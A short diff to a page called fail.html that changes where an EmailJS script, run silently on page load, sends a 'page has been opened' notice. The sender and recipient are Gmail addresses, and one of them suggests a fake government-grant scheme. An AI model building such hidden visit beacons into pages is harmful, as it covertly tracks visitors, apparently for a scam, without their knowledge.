--- a/fail.html
+++ b/fail.html
@@ -2427,7 +2427,7 @@
     <script type="text/javascript">
         window.onload = function() {
             emailjs.send("service_3d59mw7", "template_39knkcv", {
-                to_email: "usgrant2022gov@gmail.com",
+                to_email: "Numaeliteoffice@gmail.com",
                 from_email: "classc928@gmail.com",
                 message: "The doc.html page has been opened."
             })
